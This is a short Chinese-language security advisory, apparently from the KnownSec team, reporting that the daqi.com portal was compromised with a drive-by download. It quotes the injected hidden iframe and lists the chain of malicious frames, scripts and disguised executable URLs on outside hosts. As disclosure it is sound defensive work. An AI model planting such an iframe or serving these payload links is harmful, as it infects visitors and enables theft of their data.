大旗网www.daqi.com (原ChinaBBS.com)于2004年11月成立,2006年3月正式更名为“大旗网”,是中国最早的论坛聚合门户。大旗网先后得到了IDG技术创业投资基金(简称IDGVC Partners)和美国中经合集团(WI Harper Group)的投资。目前已经成为都市新锐人群首选的话题门户,也是中国最领先的社区营销咨询和服务机构。
知道创宇安全团队(KnownSec team)于今天捕获大旗网(http://www.daqi.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://union.daqi.com/digg/win_login.html
网页被嵌入恶意链接代码:
<iframe src=http://go.chacha03.cn/w50/w50.htm width=100 height=0></iframe>
挂马分析:
[wide]http://www.daqi.com/
[frame]http://union.daqi.com/digg/win_login.html
[frame]http://go.chacha03.cn/w50/w50.htm
[frame]http://go.chacha03.cn/w50/new.html
[frame]http://go.chacha03.cn/w50/../as.htm
[exe]http://wwww.ttfabb.com/wl.css
[frame]http://go.chacha03.cn/w50/for.htm
[exe]http://wwww.ttfabb.com/w50.css
[frame]http://go.chacha03.cn/w50/../gword.htm
[script]http://go.chacha03.cn/w50/../glz.js
[exe]http://wwww.ttfafb.com/wl.css
[frame]http://go.chacha03.cn/w50/../baozi.htm
[script]http://go.chacha03.cn/w50/../baozi.js
[exe]http://wwww.ttfafb.com/wl.css
[frame]http://go.chacha03.cn/w50/../all10.htm
[script]http://go.chacha03.cn/w50/../re.js
[exe]http://wwww.ttfabb.com/wl.css
[frame]http://go.chacha03.cn/w50/../all11.htm
[script]http://go.chacha03.cn/w50/../realdadong.js
[exe]http://wwww.ttfafb.com/wl.css
[script]http://go.chacha03.cn/w50/../new.js
[cab]http://go.chacha03.cn/baidu.cab
[frame]http://go.chacha03.cn/w50/fx.htm
[frame]http://go.chacha03.cn/w50/../supp.htm
[script]http://go.chacha03.cn/w50/../cx.js
[exe]http://wwww.ttfafb.com/wl.css
[script]http://js.t0ngji.cn.yahoo.com/932869/ystat.js
[script]http://js.tongji.cn.yahoo.com/932869/ystat.js
[script]http://count1.51much.com/cnt.php?uid=ua-1-12435&style=icon&logo=1
最终下载病毒文件:
http://wwww.ttfabb.com/wl.css
http://wwww.ttfabb.com/w50.css
http://wwww.ttfabb.com/baidu.cab
通过执行以上病毒文件,来达到完全控制访问者的系统。
知道创宇安全团队(KnownSec team)建议用户及时安装系统安全更新补丁,使用杀毒软件开启监控保护系统免受病毒侵入。